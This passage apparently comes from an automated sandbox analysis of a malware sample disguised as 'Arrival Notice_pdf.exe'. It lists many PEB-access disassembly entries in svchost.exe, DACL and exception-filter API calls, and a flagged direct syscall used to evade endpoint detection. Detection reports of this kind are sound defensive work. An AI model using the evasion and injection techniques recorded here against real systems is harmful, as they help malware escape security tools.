Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]	1_2_03BC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]	1_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]	1_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]	1_2_03B644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]	1_2_03BBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]	1_2_03B364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]	1_2_03BEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]	1_2_03B304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]	1_2_03B2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]	1_2_03BBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]	1_2_03BEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]	1_2_03B2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]	1_2_03B5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]	1_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]	1_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]	1_2_03B5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]	1_2_03BBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]	1_2_03BDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]	1_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]	1_2_03C04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]	1_2_03B2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]	1_2_03B28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]	1_2_03BDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]	1_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]	1_2_03BD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]	1_2_03B86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]	1_2_03B68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]	1_2_03C04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]	1_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]	1_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]	1_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]	1_2_03B6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]	1_2_03B5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]	1_2_03BBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]	1_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]	1_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]	1_2_03BDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]	1_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]	1_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]	1_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]	1_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]	1_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]	1_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]	1_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]	1_2_03BBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]	1_2_03B649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]	1_2_03BFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]	1_2_03BC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]	1_2_03C04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]	1_2_03BB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]	1_2_03BC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]	1_2_03BBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]	1_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]	1_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]	1_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]	1_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]	1_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]	1_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]	1_2_03BBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]	1_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]	1_2_03BB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]	1_2_03C008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]	1_2_03BBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]	1_2_03B30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]	1_2_03BFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]	1_2_03B52835

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0027A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0027A66C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_002681AC
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00268189 SetUnhandledExceptionFilter,		0_2_00268189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
